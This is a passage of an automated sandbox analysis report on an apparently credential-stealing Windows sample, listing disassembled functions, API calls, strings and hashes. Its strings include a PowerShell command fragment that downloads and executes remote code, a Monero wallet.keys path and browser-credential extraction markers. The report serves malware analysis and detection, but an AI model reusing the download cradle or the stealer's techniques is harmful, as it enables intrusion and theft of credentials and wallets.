                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                        • String ID:
                        • API String ID: 3066467675-0
                        • Opcode ID: d5433ebfc90bcecad5b5e4775f8775a6938a199e8a8c31f479e9f1fa67deefc1
                        • Instruction ID: 75fdc4a7f3c574fbf7afdd07fe956c9706b9066ca021a304e5da9e427a21e31e
                        • Opcode Fuzzy Hash: d5433ebfc90bcecad5b5e4775f8775a6938a199e8a8c31f479e9f1fa67deefc1
                        • Instruction Fuzzy Hash: 9E3108B4A00218ABDB20CF54DC85BDDB7B4EB48704F1081E8FA09A7281C7706AD5CF99
                        Function 002783DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                        Download Yara Rule
                        APIs
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00278426
                        • wsprintfA.USER32 ref: 00278459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0027847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 0027848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 00278499
                          • Part of subcall function 0027A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0027A7E6
                        • RegQueryValueExA.ADVAPI32(00000000,00E2E130,00000000,000F003F,?,00000400), ref: 002784EC
                        • lstrlen.KERNEL32(?), ref: 00278501
                        • RegQueryValueExA.ADVAPI32(00000000,00E2E0B8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00280B34), ref: 00278599
                        • RegCloseKey.ADVAPI32(00000000), ref: 00278608
                        • RegCloseKey.ADVAPI32(00000000), ref: 0027861A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                        • String ID: %s\%s
                        • API String ID: 3896182533-4073750446
                        • Opcode ID: 0838fa7870e227ddd9798e1d2af3651829de16471fa2649b405276adb65cb63c
                        • Instruction ID: bf4ac4b5d9886e5f546588e4e42e863b346dada6afc3d576ec648b7b52234f82
                        • Opcode Fuzzy Hash: 0838fa7870e227ddd9798e1d2af3651829de16471fa2649b405276adb65cb63c
                        • Instruction Fuzzy Hash: 1E212A71950218ABDB24DF54CC85FE9B7B8FB48700F00C1A8E60996180DF716A95CFD4
                        Function 00277720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00277734
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0027773B
                        • RegOpenKeyExA.ADVAPI32(80000002,00E1C350,00000000,00020119,002776B9), ref: 0027775B
                        • RegQueryValueExA.ADVAPI32(002776B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0027777A
                        • RegCloseKey.ADVAPI32(002776B9), ref: 00277784
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: CurrentBuildNumber
                        • API String ID: 3225020163-1022791448
                        • Opcode ID: 98472ae6bf08d12e18e661975b0dd9b5caafcb7e3d0285415ae202c1109a1681
                        • Instruction ID: 627d6f8b03daee68f5575d5ab47b16502a773224f7034ebbc0009a0e53f61e19
                        • Opcode Fuzzy Hash: 98472ae6bf08d12e18e661975b0dd9b5caafcb7e3d0285415ae202c1109a1681
                        • Instruction Fuzzy Hash: C40144B9A40308BBDB00EFE0DC4AFBEBBB8EB48701F004158FA05A7281D7749524CB55
                        Function 002792E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNEL32(:',80000000,00000003,00000000,00000003,00000080,00000000,?,00273AEE,?), ref: 002792FC
                        • GetFileSizeEx.KERNEL32(000000FF,:'), ref: 00279319
                        • CloseHandle.KERNEL32(000000FF), ref: 00279327
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleSize
                        • String ID: :'$:'
                        • API String ID: 1378416451-956700391
                        • Opcode ID: 46fc8803e2822563a23b04457b6b9e037c8d9f572b234f600db5f112a054fec5
                        • Instruction ID: 33522cf6460f9ffdc9f750dc6cfd5451a17700dba72f92f4930900baf07ece01
                        • Opcode Fuzzy Hash: 46fc8803e2822563a23b04457b6b9e037c8d9f572b234f600db5f112a054fec5
                        • Instruction Fuzzy Hash: 0AF08C38E50308BBDB10DFB0DC08BAE7BB9AB48310F10C2A4B655AB2C0D6749650CF44
                        Function 002699C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002699EC
                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00269A11
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00269A31
                        • ReadFile.KERNEL32(000000FF,?,00000000,0026148F,00000000), ref: 00269A5A
                        • LocalFree.KERNEL32(0026148F), ref: 00269A90
                        • CloseHandle.KERNEL32(000000FF), ref: 00269A9A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                        • String ID:
                        • API String ID: 2311089104-0
                        • Opcode ID: 0cb65b922559d3346ab37031a38da8ecaea8fe56f1a54e1a77d3123266bd72ed
                        • Instruction ID: f104c03d807fe9996d4528c5f49505745e2dcf374da18dbcc6ae3f2dfd2dea32
                        • Opcode Fuzzy Hash: 0cb65b922559d3346ab37031a38da8ecaea8fe56f1a54e1a77d3123266bd72ed
                        • Instruction Fuzzy Hash: 30311A74A10209EFDB14CF94C885BAE7BF9FF49310F108158E911AB290DB75AD91CFA1
                        Function 0027C84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: String___crt$Typememset
                        • String ID:
                        • API String ID: 3530896902-3916222277
                        • Opcode ID: da414bbec8f8e7f0bc410b61f5dd3c26cda7c1e3dc5037046cbea686f84ecb19
                        • Instruction ID: 245fdf78dc892428f7433a5a58333584c2fb9c6a8f4fd08577a171022057ebc0
                        • Opcode Fuzzy Hash: da414bbec8f8e7f0bc410b61f5dd3c26cda7c1e3dc5037046cbea686f84ecb19
                        • Instruction Fuzzy Hash: 6341C6B151075C9EDB228B34CC85BFBBBED9F45704F2484ECEA8E86182D2719A548F60
                        Function 00274780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcat.KERNEL32(?,00E2E4D8), ref: 002747DB
                          • Part of subcall function 00278DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00278E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00274801
                        • lstrcat.KERNEL32(?,?), ref: 00274820
                        • lstrcat.KERNEL32(?,?), ref: 00274834
                        • lstrcat.KERNEL32(?,00E1B8F8), ref: 00274847
                        • lstrcat.KERNEL32(?,?), ref: 0027485B
                        • lstrcat.KERNEL32(?,00E2DC30), ref: 0027486F
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 00278D90: GetFileAttributesA.KERNEL32(00000000,?,00261B54,?,?,0028564C,?,?,00280E1F), ref: 00278D9F
                          • Part of subcall function 00274570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00274580
                          • Part of subcall function 00274570: RtlAllocateHeap.NTDLL(00000000), ref: 00274587
                          • Part of subcall function 00274570: wsprintfA.USER32 ref: 002745A6
                          • Part of subcall function 00274570: FindFirstFileA.KERNEL32(?,?), ref: 002745BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                        • String ID:
                        • API String ID: 2540262943-0
                        • Opcode ID: 05edfd54478b468dee208fd8e0ce94acd17702dc2eceb6e61946eb7685b3d5f2
                        • Instruction ID: 5069c16020899784b404aaec1bf02f8b7c6ca39bc9f7fdbf56541ee200ba1d6c
                        • Opcode Fuzzy Hash: 05edfd54478b468dee208fd8e0ce94acd17702dc2eceb6e61946eb7685b3d5f2
                        • Instruction Fuzzy Hash: BD3196B295020897CB50FBB0DC89EED777CBB58700F408599B31996081EF749799CF96
                        Function 00272C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00272D85
                        Strings
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00272D04
                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00272CC4
                        • <, xrefs: 00272D39
                        • ')", xrefs: 00272CB3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        • API String ID: 3031569214-898575020
                        • Opcode ID: dc2452cf86762aa1b86a19e79470f7270af6814d675ab1fbe162e7e0e123d679
                        • Instruction ID: 524631feded82730aa5144b61ed98c628e879476bdebd7a331da6aad6ad26e91
                        • Opcode Fuzzy Hash: dc2452cf86762aa1b86a19e79470f7270af6814d675ab1fbe162e7e0e123d679
                        • Instruction Fuzzy Hash: 2E41C371C20108DADB18FFA0C896FDEBB74AF54310F408129F11AA7191DF746A6ACF96
                        Function 00269E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                        Download Yara Rule
                        APIs
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00269F41
                          • Part of subcall function 0027A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0027A7E6
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$AllocLocal
                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                        • API String ID: 4171519190-1096346117
                        • Opcode ID: 75f2ccc8a61d183f5e90e3f9b963d0cfef900f637d508d57089626f72d50a4ed
                        • Instruction ID: c2db6fed363d0c6d9b901a3dd92026445f8a0480196c7610b88ffed16dc16b38
                        • Opcode Fuzzy Hash: 75f2ccc8a61d183f5e90e3f9b963d0cfef900f637d508d57089626f72d50a4ed
                        • Instruction Fuzzy Hash: F8616271A20208DBDB18EFA4CC96FEEB775AF84304F008118F90A5F181DB746A65CF52
                        Function 002770D0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 140COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                        • memset.MSVCRT ref: 0027716A
                        Strings
                        • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0027718C
                        • s', xrefs: 00277111
                        • s', xrefs: 002772AE, 00277179, 0027717C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpymemset
                        • String ID: s'$s'$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                        • API String ID: 4047604823-3815180687
                        • Opcode ID: f28ec73ef48e6570e7fe39987b43a4da9370e123205f9ef27de61f3bcf6d0a2c
                        • Instruction ID: 94f06e96cb9574b61a170cc87be0826e259ecadf428be8ea7a03aa4918f8a844
                        • Opcode Fuzzy Hash: f28ec73ef48e6570e7fe39987b43a4da9370e123205f9ef27de61f3bcf6d0a2c
                        • Instruction Fuzzy Hash: 9251B0B0D242199BDB14EF90DC81BEEB374AF44304F5081A8E61D77182EB746E98CF69
                        Function 00277E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00277E37
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00277E3E
                        • RegOpenKeyExA.ADVAPI32(80000002,00E1C4A0,00000000,00020119,?), ref: 00277E5E
                        • RegQueryValueExA.ADVAPI32(?,00E2D9B0,00000000,00000000,000000FF,000000FF), ref: 00277E7F
                        • RegCloseKey.ADVAPI32(?), ref: 00277E92
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
